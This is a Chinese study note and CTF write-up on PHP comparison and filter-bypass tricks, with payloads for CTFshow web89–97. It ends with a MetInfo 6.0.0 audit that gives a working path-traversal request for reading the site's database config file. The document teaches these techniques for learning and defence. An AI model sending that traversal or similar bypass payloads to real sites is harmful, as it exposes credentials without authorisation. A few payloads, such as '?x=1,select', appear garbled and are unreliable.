知识点:
1、过滤函数缺陷绕过
2、学习知识点的作用
-
CTF考点
-
代码审计
php函数特性知识点讲解
1、== 和 ===对比
?==不会对比类型 ?===会对比类型
==
<?php
header("Content-Type:text/html;charset=utf-8");
$flag = '小迪师傅--yyds';
?
$a=1;
if($a==$_GET['x']){
echo $flag;
}==判断的时候 不会对比数值的类型,如判断是否等于1 在浏览器接收的时候 1、1.0、+1、1**都是可以的
payload:
?x=1,select
===
<?php
header("Content-Type:text/html;charset=utf-8");
$flag = '小迪师傅--yyds';
?
$a='1';
if($a===$_GET['y']){
echo $flag;
}===不仅会对比变量的数值,而且还会对比数值的类型,所以 “y=1、1.0、+1、1**”都是不可以使用了。
2、MD5缺陷绕过
==绕过
PHP中==是判断值是否相等,若两个变量的类型不相等,则会转化为相同类型后再进行比较。PHP在处理哈希字符串的时候,它把每一个以0e开头并且后面字符均为纯数字的哈希值都解析为0。
在md5加密后以0E开头
| 原文 | MD5密文 |
|---|---|
| QNKCDZO | 0e830400451993494058024219903391 |
| 240610708 | 0e462097431906509019562988736854 |
| s878926199a | 0e545993274517709034328855841020 |
| s155964671a | 0e342768416822451524974117254469 |
<?php
header("Content-Type:text/html;charset=utf-8");
$flag = '小迪师傅--yyds';
?
if($_GET['name'] != $_GET['password']){
if(MD5($_GET['name']) == MD5($_GET['password'])){
echo $flag;
}
echo '?';
}payload:
?name=QNKCDZO&password=240610708
===的绕过
===会比较类型,这个时候可以用到PHP中md5()函数无法处理数组(会返回NULL)来实现绕过。
<?php
header("Content-Type:text/html;charset=utf-8");
$flag = '小迪师傅--yyds';
?
if($_GET['name'] != $_GET['password']){
if(MD5($_GET['name']) === MD5($_GET['password'])){
echo $flag;
}
echo '?';
}payload:
/?name[]=1&password[]=2虽然报错但是可以正常 输出结果
3、intval缺陷绕过
intval() 函数用于获取变量的整数值。
intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。
语法
int intval ( mixed $var [, int $base = 10 ] )
参数说明:
-
$var:要转换成 integer 的数量值。
-
$base:转化所使用的进制。
如果 base 是 0,通过检测 var 的格式来决定使用的进制:
-
如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,
-
如果字符串以 "0" 开始,使用 8 进制(octal);否则,
-
将使用 10 进制 (decimal)。
返回值:
成功时返回 var 的 integer 值,失败时返回 0。 空的 array 返回 0,非空的 array 返回 1
<?php
header("Content-Type:text/html;charset=utf-8");
$flag = '小迪师傅--yyds';
$i='666';
$ii=$_GET['n'];
if(intval($ii==$i,0)){
echo $flag;
}根据上面intval()函数介绍,可以知道base值为0,所以可以使用使用其他进制替换666数据进行绕过。
八进制的666-->01232
十六进制-->0x29a
payload:
?n=0x29a
4、strpos()函数缺陷绕过
strpos() 查找 "php" 在字符串中第一次出现的位置:
<?php
echo strpos("You love php, I love php too!","php");
?>语法
strpos(string,find,start)
| 参数 | 描述 |
|---|---|
| string | 必需。规定要搜索的字符串。 |
| find | 必需。规定要查找的字符串。 |
| start | 可选。规定在何处开始搜索。 |
返回值
返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。
注释:字符串位置从 0 开始,不是从 1 开始。
<?php
header("Content-Type:text/html;charset=utf-8");
$flag = '小迪师傅--yyds';
$i='123666';
$ii=$_GET['h'];
if(strpos($i,$ii,"0")){
echo $flag;
}if(0)没有办法触发函数if,如果%0a666进行换行查找的话,换行也会被带进去查找!
5、in_array第三个参数安全
in_array-检查数组中是否存在某个值
语法
in_array(search,array,type)
-
search 必需。规定要在数组搜索的值。
-
array 必需。规定要搜索的数组。
-
type 可选。如果设置该参数为 true,则检查搜索的数据与数组的值的类型是否相同。
如果不设置第三个参数,那么相当于==不对比数据类型则1.0、+1、1,***都是可以绕过的
<?php
header("Content-Type:text/html;charset=utf-8");
$flag = '小迪师傅--yyds';
$whitelist = [1,2,3];
$page=$_GET['i'];
if (in_array($page, $whitelist)) {
echo '$flag';
}payload:
?i=+1.0,sec
6、preg_match正则表达式
修饰符含义
| 修饰符 | 意义 |
|---|---|
| / i | 不区分大小写的匹配 |
| / s | 使句点( . )匹配任何字符,包括换行符( ) |
| / x | 从模式中删除空白符和注释 |
| / m | 使 ^ 匹配换行符 ( )之后的内容,美元符号($)匹配换行符 ( )之前的内容 |
| / e | 如果替换字符串是PHP代码,使用eval()执行该代码来得到实际的替换字符串 |
| / U | 颠倒子模式的贪婪性; * 和 + 尽可能少地匹配而不是尽可能多。 |
| / u | 把模式字符串当作UTF - 8编码对待 |
| / X | 如果一个反斜杠之后跟着没有特殊意义的字符,将产生一个错误 |
| / A | 把锚定位在字符串的开头就像模式中有 ^ 一样 |
| / D | 使 $字符仅匹配一行的末尾 |
| / S | 使表达式解析器更加小心地检查模式的结构,使得第二次运行时(如在一个循环中)加快速度 |
下方代码:
不能输入0-9,但还要进入if(intval($num))这个函数
<?php
header("Content-Type:text/html;charset=utf-8");
$flag = '小迪师傅--yyds';
if(isset($_GET['num'])){
$num = $_GET['num'];
if(preg_match("/[0-9]/", $num)){
die("no no no!");
}
if(intval($num)){
echo $flag;
}
}绕过思路:preg_match 无法匹配数组
payload
/?num[]=1
7、str_replace无法迭代过滤
把字符串 "Hello world!" 中的字符 "world" 替换成 "Peter":
<?php
echo str_replace("world","Peter","Hello world!");
?>语法
str_replace(find,replace,string,count)
| 参数 | 描述 |
|---|---|
| find | 必需。规定要查找的值。 |
| replace | 必需。规定替换 find 中的值的值。 |
| string | 必需。规定被搜索的字符串。 |
| count | 可选。一个变量,对替换数进行计数。 |
<?php
header("Content-Type:text/html;charset=utf-8");
$sql=$_GET['s'];
$sql=str_replace('select','',$sql);
echo $sql;过滤select,但是最终实现输出select的效果
str_replace只可以替换一次,所以可以使用双写构造语法进行绕过
payload:
/?s=sselectelect
学以致用
学习了以上知识点后,可以通过刷题巩固自己的学习效果,以及验证自己学习的内容是否有用,主要是CTFSHOW web89-97关和源码的代码审计。
????????????????????????????????????????????????👇👇👇👇👇👇👇👇ctfshow👇👇👇👇👇👇👇👇
web89
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if(preg_match("/[0-9]/", $num)){
die("no no no!");
}
if(intval($num)){
echo $flag;
}
} 题目分析:
接受变量num,num变量不可以出现0-9,但是还必须要求num是正数。
preg_match不可以处理数组。
payload
?num[]=1web90
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==="4476"){
die("no no no!");
}
if(intval($num,0)===4476){
echo $flag;
}else{
echo intval($num,0);
}
}题目分析
接受num变量,num不可以等于4476但是有要求进入 if(intval($num,0)===4476)函数拿到flag
根据intval()函数特性,我们可以进行禁止转换
八进制4476-->10574
十六进制4476-->117c
payload
/?num=010574
/?num=0x117cweb91
<?php
show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
if(preg_match('/^php$/i', $a)){
echo 'hacker';
}
else{
echo $flag;
}
}
else{
echo 'nonononono';
}题目分析
php开头,php结尾、i不区分大小写、m是多行匹配
第一个preg_match是修饰符是im,第二个是i,所以我们可以使用换行绕过
正则表达式详解:https://www.jb51.net/article/36172.htm
payload
?cmd=%0Aphpweb92
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(intval($num,0)==4476){
echo $flag;
}else{
echo intval($num,0);
}
} 题目分析
接受变量num,num值不等于4476绕过第一个if,有要求intval($num,0)==4476,intval是取整,所以可以令num=4476.1也可以进行进制转换构造payload。
payload
/?num=4476.1web93
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(preg_match("/[a-z]/i", $num)){
die("no no no!");
}
if(intval($num,0)==4476){
echo $flag;
}else{
echo intval($num,0);
}
} 题目分析
比92题多了一个正则匹配,不可以输入a-z,相当于禁止了十六进制转换构造payload
payload
/?num=4476.1web94
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==="4476"){
die("no no no!");
}
if(preg_match("/[a-z]/i", $num)){
die("no no no!");
}
if(!strpos($num, "0")){
die("no no no!");
}
if(intval($num,0)===4476){
echo $flag;
}
} 题目分析
在93的基础上过滤了开头为0的数字 这样的话就不能使用进制转换来进行操作 我们可以使用小数点来进行操作。
/?num=4476.0web95
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(preg_match("/[a-z]|\./i", $num)){
die("no no no!!");
}
if(!strpos($num, "0")){
die("no no no!!!");
}
if(intval($num,0)===4476){
echo $flag;
}
} 题目分析
多了一个不需要使用点,就相当于上面的小数就不可以使用了。因为前面是弱类型比较,可以在前面加入一个下划线来绕过num=_010574,发现没有出现flag但是也没有出现nonono,所以表示前面三个过滤条件都已经绕过了。就是输出flag的函数没有触发,把其他的特殊符号都是一下,最后发现加号和空格可以。
intval在处理加号和空格开发的数字的时候,会作为一个整数处理
payload
/?num=+010574web96
<?php
highlight_file(__FILE__);
if(isset($_GET['u'])){
if($_GET['u']=='flag.php'){
die("no no no");
}else{
highlight_file($_GET['u']);
}
}题目分析
不可以直接输入flag.php但是又要求读取flag.php,可以通过加入路径经行读取。
payload
/?u=./flag.phpweb97
<?php
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>题目分析
post接受a和b,但是进入if ($POST['a'] != $POST['b'])有要求md5($POST['a']) === md5($POST['b'])相等,md5不可以处理数组返回值都是NULL
payload:
a[]=1&b[]=2?????????????????????????????????????? 👇👇👇👇👇👇👇👇代码审计👇👇👇👇👇👇👇👇
MetInfo6.0.0代码审计
根据学习的以上知识点,可以进行简单的代码审计。
搜索关键字str_place
\MetInfo6\app\system\include\module\old_thumb.class.php
从代码中可以看到,$dir直接由$_GET['dir']传递进来,并将../和./置空。目标是进入到第一个if里面的readfile($dir);,读取文件。
看看if语句的条件,里面的是将$dir中包含$_M['url']['site']的部分置空,这里可以不用管。外面是一个strstr函数,判断$dir中http字符串的首次出现位置,也就是说,要进入到这个if语句里面,$dir中包含http字符串即可。
从上面的分析可以构造出payload,只要$dir里包含http字符串就可以进入到readfile函数从而读取任意函数,然后可以使用.....///来进行目录跳转,因为../和./会被置空,所以最终payload如下:
/include/thumb.php?dir=.....///http/.....//\config\config_db.php被替换后实际带入其中的结果是:
../http/..\config\config_db.php
总结:
跌跌撞撞的算是把二十天的内容搞定了,其中看了许多资料也收获了很多。一看就会-一座就废,看了≠会了。
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。